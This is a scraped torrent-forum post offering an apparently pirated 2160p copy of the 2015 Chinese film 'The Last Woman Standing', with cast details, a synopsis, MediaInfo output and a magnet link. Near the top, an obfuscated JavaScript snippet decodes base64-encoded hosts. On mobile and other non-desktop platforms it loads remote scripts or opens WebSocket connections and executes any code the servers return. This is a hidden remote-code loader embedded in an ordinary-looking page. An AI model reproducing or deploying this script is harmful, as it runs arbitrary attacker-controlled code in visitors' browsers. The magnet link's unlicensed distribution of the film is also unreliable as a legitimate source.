剩者为王[国语中字].The.Last.Woman.Standing.2015.2160p.WEB-DL.H265.AAC 11.35GB

版主小s 1月前 229

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 剩者为王 / The Last Woman Standing
◎年  代 2015
◎产  地 中国大陆 / 中国香港
◎类  别 剧情 / 爱情
◎语  言 汉语普通话
◎上映日期 2015-11-06(中国大陆)
◎IMDb链接 https://www.imdb.com/title/tt5257730/
◎豆瓣评分 5.8/10 (82306人评价)
◎豆瓣链接 https://movie.douban.com/subject/26279433/
◎片  长 96分钟
◎导  演 落落 Luo Luo (id:1351362)
◎编  剧 落落 Luo Luo (id:1351362)
◎演  员 舒淇 Qi Shu (id:1138320)
       彭于晏 Eddie Peng (id:1013782)
       潘虹 Hong Pan (id:1043330)
       金士杰 Shih-Chieh King (id:1275482)
       邢佳栋 Jiadong Xing (id:1274762)
       郝蕾 Lei Hao (id:1042568)
       熊黛林 Lynn Hung (id:1027481)
       陈果 Guo Chen (id:1424864)
       陈芋米 Yumi Chen (id:1373780)
         (id:1368008)
       尹露 Yin Lu (id:1454842)
       滕华涛 Hua-Tao Teng (id:1314569)
       赵依芳 Yifang Zhao (id:1397774)
       李屏宾 Mark Lee Ping Bing (id:1274482)
       李言 Yan Li (id:1456204)

◎标  签 爱情 / 舒淇 / 彭于晏 / 2015 / 中国 / 剩者为王 / 中国电影 / 落落

◎简  介
  盛如曦(舒淇 饰)的年龄眼看着就要突破三十五岁大关,虽然拥有着一份稳定且待遇优厚的工作,但她的感情世界却是一片空白。家人和朋友们都在替盛如曦着急,忙不迭的将各路不靠谱的对象介绍给她相亲,深怕盛如曦再拖下去成为嫁不出去的老姑娘,这令盛如曦感到十分苦恼。                                    
                                汪岚(郝蕾 饰)和章聿(熊黛林 饰)是盛如曦的好友,两人的情况和盛如曦差不多,三个女人坚强的在冰冷的现实社会中拼杀,躲过世俗压迫,躲过流言蜚语却最终躲不过各自内心深处对于感情的渴望。一位名叫马赛(彭于晏 饰)的男子出现在了盛如曦的身边,彻底改变了她的命运。

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : 剩者为王[email protected].COM.mp4

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media

  6. Codec ID                                 : isom (isom/iso2/mp41)

  7. File size                                : 11.3 GiB

  8. Duration                                 : 1 h 35 min

  9. Overall bit rate                         : 16.9 Mb/s

  10. Writing application                      : OurTV Multimedia Platform


  11. Video

  12. ID                                       : 1

  13. Format                                   : HEVC

  14. Format/Info                              : High Efficiency Video Coding

  15. Format profile                           : [email protected]@High

  16. Codec ID                                 : hev1

  17. Codec ID/Info                            : High Efficiency Video Coding

  18. Duration                                 : 1 h 35 min

  19. Bit rate                                 : 16.8 Mb/s

  20. Width                                    : 3 840 pixels

  21. Height                                   : 1 608 pixels

  22. Display aspect ratio                     : 2.40:1

  23. Frame rate mode                          : Constant

  24. Frame rate                               : 25.000 FPS

  25. Color space                              : YUV

  26. Chroma subsampling                       : 4:2:0

  27. Bit depth                                : 8 bits

  28. Bits/(Pixel*Frame)                       : 0.109

  29. Stream size                              : 11.3 GiB (99%)

  30. Codec configuration box                  : hvcC


  31. Audio

  32. ID                                       : 2

  33. Format                                   : AAC LC

  34. Format/Info                              : Advanced Audio Codec Low Complexity

  35. Codec ID                                 : mp4a-40-2

  36. Duration                                 : 1 h 35 min

  37. Bit rate mode                            : Constant

  38. Bit rate                                 : 124 kb/s

  39. Channel(s)                               : 2 channels

  40. Channel layout                           : L R

  41. Sampling rate                            : 44.1 kHz

  42. Frame rate                               : 43.066 FPS (1024 SPF)

  43. Compression mode                         : Lossy

  44. Stream size                              : 85.2 MiB (1%)

  45. Default                                  : Yes

  46. Alternate group                          : 1



TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:4DCF34A1FD2742F4A22A9C1EC38AC59C9272705E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回